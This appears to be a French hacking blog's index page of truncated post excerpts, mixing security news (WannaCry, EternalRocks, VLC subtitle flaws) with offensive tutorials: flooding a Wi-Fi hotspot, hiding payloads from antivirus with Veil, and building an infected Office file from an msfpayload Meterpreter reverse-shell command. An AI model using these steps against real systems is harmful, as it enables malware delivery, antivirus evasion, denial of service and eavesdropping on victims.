Auteur : Pirate informatique

Apprendre Metasploite afin être pro du Hacking

Metasploit Framework, un outil pour le développement et l’exécution d’exploits (logiciels permettant d’exploiter à son profit une vulnérabilité) contre une machine distante. Les autres sous-projets importants sont la base de données d’Opcode, l’archive de shellcode, et la recherche dans la sécurité. C’est bon Metasploit c’est bien lancer ! Nous pouvons ape...

200 millions de players vidéo à la merci d’une attaque… via le sous-titrage

    Check Point a décelé des vulnérabilités dans quatre players vidéo populaires, dont VLC. Des failles qui pourraient donner le contrôle du système à un tiers après téléchargement de sous-titres malveillants. Plus de 200 millions de lecteurs vidéo, installés sur autant de PC, terminaux mobiles et télévisions connectées, sont potentiellement vulnérables à une attaque informatique. « En créant...

Ce qu’il faut maîtriser pour devenir un bon hacker

Pour devenir un bon hacker il existe plusieurs points essentiels qu’il faut maîtriser : 1. Apprendre à utiliser le réseau C’est à dire apprendre à chercher sur le net les informations et les programmes dont vous avez besoin (savoir utiliser de façon efficace un moteur de recherche est le minimum). Ne pas perdre de temps avec des documents à l’apparence douteuse. 2. Apprendre à lire l’anglais Il fa...

Paralyser un HotSpot Wifi

Flood : est une action généralement malveillante qui consiste à envoyer une grande quantité de données inutiles dans un réseau afin de le rendre inutilisable, par exemple en saturant sa bande passante ou en provoquant le plantage des machines du réseau dont le déni de service est la conséquence possible. Tout d’abord , il nous faut le systeme d’exploitation Kali Linux . Dans ce systeme...

Rendre un payload indétectables par les antivirus avec Veil.py

Veil est un encodeur de payload écrit en python qui permet de rendre les payloads de Metasploit (ceux de Meterpreter) indétectables par les antivirus. Utilisez Kali Linux (version x86) et toutes les dépendances seront pré-installé Ou Installez Python 2.7 et PyCrypto >= 2.3 Commencez par télécharger l’archive: wget https://github.com/veil-evasion/Veil/archive/master.zip Ensuite dézippez: u...

Créer un fichier Office infecté avec un payload

Étape 1: Créer votre propre payload Voici un exemples à vous d’adapter.. msfpayload windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 X > /tmp/payload.exe Étape 2: Convertissez votre payload créé en VBA (Visual Basic for Application) script Déplacez vous dans le répertoire contenant l’outil de conversion de votre payload. cd /usr/share/metasploit-framework/tools/ Et utilise...

EternalRocks, un ver mieux outillé que WannaCry

    Après WannaCry, un autre ver a été découvert. Nommé EternalRocks, il utilise 7 outils de piratage conçus par la NSA et visant SMB de Windows. Traumatisés par WannaCry et sa viralité, les chercheurs en sécurité sont toujours aux aguets concernant des répliques. Miroslav Stampar, membre du CERT Croate et créateur du service sqlmap pour détecter les attaques par injection SQL, a trouvé au sein d’...

Collecter des informations sur une cible avec Metagoofil

  Metagoofil est un outil de collecte d’information conçu pour extraire les métadonnées de documents publics (pdf, doc, xls, ppt, docx, pptx, xlsx) appartenant à une société cible. Metagoofil effectuera une recherche dans Google pour identifier et télécharger les documents sur le disque local, puis en extrait les métadonnées avec différentes bibliothèques style Hachoir, PdfMiner? et aut...

WannaCry a été doublée par l’attaque du crypto-mineur Adylkuzz

  Selon Proofpoint, le mineur crypto-dynamique Adylkuzz emprunte les mêmes mécanismes d’infection que WannaCry. A moins que ce ne soit l’inverse. Après la demande de rançon, le minage de monnaie électronique ? Les outils de piratage de la NSA extirpés par le groupe de hackers baptisé les Shadow Brokers n’ont pas seulement servi à lancer la médiatique attaque WannaCry, du nom de ce ransomworm ...

Écouter un appel Téléphonnique avec Wireshark

  Wireshark (anciennement Ethereal) est un logiciel libre d’analyse de protocole, ou « packet sniffer », utilisé dans le dépannage et l’analyse de réseaux informatiques, le développement de protocoles, l’éducation et la rétro-ingénierie, mais aussi le piratage. Wireshark est multiplate-forme, il fonctionne sous Windows, Mac OS X, Linux, Solaris, ainsi que sous FreeBSD. Wires...

Dumper la base de registre Windows avec Dumphive

Dumphive extrais les clés et valeurs du registre win9x, nt/w2k/xp et les écrits dans un fichier .reg compatible. Dumphive peut être utilisé sous Linux, il est possible de dump le contenu du registre sur une partition Windows depuis Linux. Installation et usage Dumphive n’est pas dans les dépôts de Kali Linux, vous devrez aller sur le site de l’éditeur pour installer Dumphive, http://so...

WannaCry : du code nord-coréen… dans un malware américain

  Du code d’origine nord-coréenne a été retrouvé dans WannaCry. Le signe d’une intervention de la part du gouvernement de Pyongyang ? Neel Mehta, expert en sécurité chez Google, a retrouvé dans le code de WannaCry des similarités avec du code créé par le Lazarus Group. Une équipe de pirates nord-coréens. Un lien confirmé par les équipes de Symantec et de Kaspersky Lab. Publicité « Nous n’avons pas...

  • 1
  • 2
  • 6
Close